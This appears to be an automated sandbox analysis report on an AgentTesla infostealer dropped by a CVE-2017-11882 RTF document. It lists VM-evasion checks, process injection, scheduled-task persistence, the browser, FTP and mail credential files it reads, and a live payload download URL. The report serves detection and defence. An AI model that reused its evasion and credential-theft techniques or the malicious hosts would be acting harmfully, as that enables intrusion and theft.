Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000004.00000002.2139955625.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pridingnsjhfhdjs.exe PID: 260, type: MEMORY
Source: Yara match	File source: 4.2.pridingnsjhfhdjs.exe.2481d30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.pridingnsjhfhdjs.exe.2501288.4.raw.unpack, type: UNPACKEDPE

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Window / User API: threadDelayed 9601

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2500	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2500	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 2888	Thread sleep time: -57349s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 2888	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 2908	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 2956	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 2840	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 3024	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 3024	Thread sleep time: -150000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139579856.00000000005DB000.00000004.00000020.sdmp	Binary or memory string: VMware_S
Source: pridingnsjhfhdjs.exe, 00000004.00000002.2144018206.00000000053C0000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2395659859.0000000003399000.00000004.00000001.sdmp	Binary or memory string: pmaRrmZMHso28fQEmupq4u6MakXF6hTTLGDguufTNOrlb2/uIvLIuwU+zzZtQGJkbc4U
Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Code function: 7_2_00404208 LdrInitializeThunk,

7_2_00404208

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Memory written: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Jump to behavior

Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394876092.0000000000D50000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394876092.0000000000D50000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394876092.0000000000D50000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Queries volume information: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Queries volume information: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2394346599.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2140668644.0000000003479000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pridingnsjhfhdjs.exe PID: 260, type: MEMORY
Source: Yara match	File source: Process Memory Space: pridingnsjhfhdjs.exe PID: 912, type: MEMORY
Source: Yara match	File source: 7.2.pridingnsjhfhdjs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.pridingnsjhfhdjs.exe.372b0d0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.pridingnsjhfhdjs.exe.3688e80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.pridingnsjhfhdjs.exe.372b0d0.5.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Source: Yara match	File source: 00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pridingnsjhfhdjs.exe PID: 912, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2394346599.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2140668644.0000000003479000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pridingnsjhfhdjs.exe PID: 260, type: MEMORY
Source: Yara match	File source: Process Memory Space: pridingnsjhfhdjs.exe PID: 912, type: MEMORY
Source: Yara match	File source: 7.2.pridingnsjhfhdjs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.pridingnsjhfhdjs.exe.372b0d0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.pridingnsjhfhdjs.exe.3688e80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.pridingnsjhfhdjs.exe.372b0d0.5.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Scheduled Task/Job1	Process Injection112	Disable or Modify Tools11	OS Credential Dumping2	File and Directory Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Deobfuscate/Decode Files or Information1	Input Capture21	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information3	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Logon Script (Mac)	Logon Script (Mac)	Software Packing2	NTDS	Security Software Discovery211	Distributed Component Object Model	Input Capture21	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Virtualization/Sandbox Evasion13	SSH	Clipboard Data1	Data Transfer Size Limits	Application Layer Protocol132	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion13	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Revised Purchase Order 1214.doc	46%	Virustotal		Browse
Revised Purchase Order 1214.doc	43%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
7.2.pridingnsjhfhdjs.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138205		Download File

Domains

Source	Detection	Scanner	Label	Link
globalteamacademy.com	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://globalteamacademy.com/showcase/pal/TrC86HH4pxVZ49N.exe	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://crl.oces.certifikat.dk/oces.crl0	0%	URL Reputation	safe
http://crl.oces.certifikat.dk/oces.crl0	0%	URL Reputation	safe
http://crl.oces.certifikat.dk/oces.crl0	0%	URL Reputation	safe
http://crl.oces.certifikat.dk/oces.crl0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
https://ca.sia.it/secclu	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://www.ancert.com/cps0	0%	URL Reputation	safe
http://www.ancert.com/cps0	0%	URL Reputation	safe
http://www.ancert.com/cps0	0%	URL Reputation	safe
http://www.ancert.com/cps0	0%	URL Reputation	safe
http://ca.sia.it/seccli/repository/CRL.der0J	0%	URL Reputation	safe
http://ca.sia.it/seccli/repository/CRL.der0J	0%	URL Reputation	safe
http://ca.sia.it/seccli/repository/CRL.der0J	0%	URL Reputation	safe
http://ca.sia.it/seccli/repository/CRL.der0J	0%	URL Reputation	safe
http://www.acabogacia.org0	0%	URL Reputation	safe
http://www.acabogacia.org0	0%	URL Reputation	safe
http://www.acabogacia.org0	0%	URL Reputation	safe
http://www.acabogacia.org0	0%	URL Reputation	safe
http://www.certifikat.dk/repository0	0%	URL Reputation	safe
http://www.certifikat.dk/repository0	0%	URL Reputation	safe
http://www.certifikat.dk/repository0	0%	URL Reputation	safe
http://www.certifikat.dk/repository0	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy0	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy0	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy0	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://www.post.trust.ie/reposit/cps.html0	0%	URL Reputation	safe
http://www.post.trust.ie/reposit/cps.html0	0%	URL Reputation	safe
http://www.post.trust.ie/reposit/cps.html0	0%	URL Reputation	safe
http://www.post.trust.ie/reposit/cps.html0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://crl.securetrusm	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	URL Reputation	safe
http://www.quovadis.bm0	0%	URL Reputation	safe
http://www.quovadis.bm0	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.certicamara.com0	0%	URL Reputation	safe
http://www.certicamara.com0	0%	URL Reputation	safe
http://www.certicamara.com0	0%	URL Reputation	safe
http://crl.ssc.lt/root-a/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-a/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-a/cacrl.crl0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
globalteamacademy.com	43.252.37.193	true	true	7%, Virustotal, Browse	unknown
mail.privateemail.com	198.54.122.60	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://globalteamacademy.com/showcase/pal/TrC86HH4pxVZ49N.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://127.0.0.1:HTTP/1.1	pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.oces.certifikat.dk/oces.crl0	pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.e-me.lv/repository0	pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ca.sia.it/secclu	pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.acabogacia.org/doc0	pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.entrust.net/server1.crl0	pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	false		high
http://ocsp.sectigo.com0	pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net03	pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ancert.com/cps0	pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ca.sia.it/seccli/repository/CRL.der0J	pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.acabogacia.org0	pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certifikat.dk/repository0	pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.chambersign.org1	pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pkioverheid.nl/policies/root-policy0	pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://mail.privateemail.com	pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmp	false		high
http://crl.ssc.lt/root-c/cacrl.crl0	pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.post.trust.ie/reposit/cps.html0	pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
